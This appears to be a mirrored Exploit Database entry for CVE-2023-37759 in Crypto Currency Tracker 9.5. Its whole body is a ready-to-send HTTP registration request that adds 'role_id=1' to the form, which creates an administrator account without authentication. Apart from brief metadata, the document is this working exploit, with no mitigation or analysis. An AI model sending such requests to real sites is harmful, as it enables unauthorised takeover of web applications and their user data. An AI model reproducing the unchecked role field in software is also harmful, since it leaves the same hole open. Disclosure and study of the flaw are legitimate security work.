Crypto Currency Tracker (CCT) 9.5 – Admin Account Creation (Unauthenticated)

• Exploit Database
• 20 阅读

• 作者： 0xBr
  日期： 2023-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51688/

• # Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
  # Date: 11.08.2023
  # Exploit Author: 0xBr
  # Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
  # Version: <=9.5
  # CVE: CVE-2023-37759
  
  POST /en/user/register HTTP/2
  Host: localhost
  Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-GB,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 756
  
  _token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register